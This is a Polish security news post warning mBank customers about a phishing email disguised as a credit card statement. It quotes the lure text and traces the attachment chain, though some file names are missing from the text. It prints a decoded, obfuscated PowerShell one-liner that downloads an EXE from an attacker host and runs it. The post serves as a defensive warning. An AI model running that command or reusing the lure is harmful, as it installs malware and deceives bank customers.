Uwaga klienci mBanku – ktoś wysyła fałszywe wyciągi z karty kredytowej

dodał 11 kwietnia 2017 o 07:21 w kategorii Złośniki  z tagami:
Uwaga klienci mBanku – ktoś wysyła fałszywe wyciągi z karty kredytowej

Klienci polskich banków – i same banki – nie mają ostatnio łatwego życia. W sieci nie brakuje kolejnych prób ataków i wyłudzeń. Kolejna pułapka właśnie została przez przestępców zastawiona na klientów mBanku.

Do jednego z naszych Czytelników dotarła dość unikatowa próbka. Dostaliśmy tylko jeden egzemplarz, a złośliwego oprogramowania jeszcze chwilę temu nie było w serwisie VirusTotal. My przyjrzyjmy się atakowi, a Wy ostrzeżcie znajomych którzy mają w mBanku konta.

Email prawie jak normalny

Złośliwa wiadomość wygląda identycznie jak zwyczajowy wyciąg z operacji na karcie przesyłany przez mBank. Tytuł to „mBank – Elektroniczne zestawienie operacji na karcie kredytowej” zaś w treści znajdziemy:

Witamy,
dziękujemy za korzystanie z usług mBanku. W załączniku przesyłamy wyciąg okresowy z rachunku karty kredytowej.

Jeśli masz aktywną usługę wysyłki szyfrowanych wyciągów, w celu otwarcia załączonego dokumentu wpisz aktualne hasło do szyfrowania wyciągów, które ustaliłeś w serwisie transakcyjnym.
Więcej informacji na temat szyfrowania wyciągów znajdziesz na stronie mBanku.

Pozdrawiamy,
Zespół mBanku

O ile treść wiadomości jest dość niewinna, to już gorzej z załącznikiem. Jest to plik o nazwie

w którym spakowany jest folder o nazwie

w którym znajdują się dwa pliki:

Zawartość pliku TXT to

Tym hasłem zabezpieczony jest plik RAR. Po jego rozpakowaniu możemy znaleźć folder

a w nim plik

Identyczny łańcuch plików i folderów obserwowaliśmy ostatnio w kampanii pt. „faktury Netii”.

Zawartość pliku VBS to:

Gdy weźmiemy część zakodowaną w base64 i zdekodujemy, otrzymamy:

 PowERSHelL.eXe -ExeCUtiOnPOLicY bYPAsS  -windowSTyle HIdDEn inVOkE-webRequeSt -UrI  http://kwiecien2017.pdns.cz/api/r55xkw.exe  -outFile  $enV:tEMp\sterownikiAUX.exe  ; inVoKE-iTEm  $ENv:TemP\sterownikiAUX.exe

Czyli kod VBS pobiera i uruchamia plik

Plik EXE wrzuciliśmy na VT i okazało się, że byliśmy pierwsi. Znaleźliśmy jedynie ślady pliku VBS wrzucanego kilka godzin wcześniej. To znaczy, że kampania ma najprawdopodobniej ograniczony zasięg. Analizę pliku EXE opublikujemy jak tylko zespół Anonimowych Analityków się obudzi.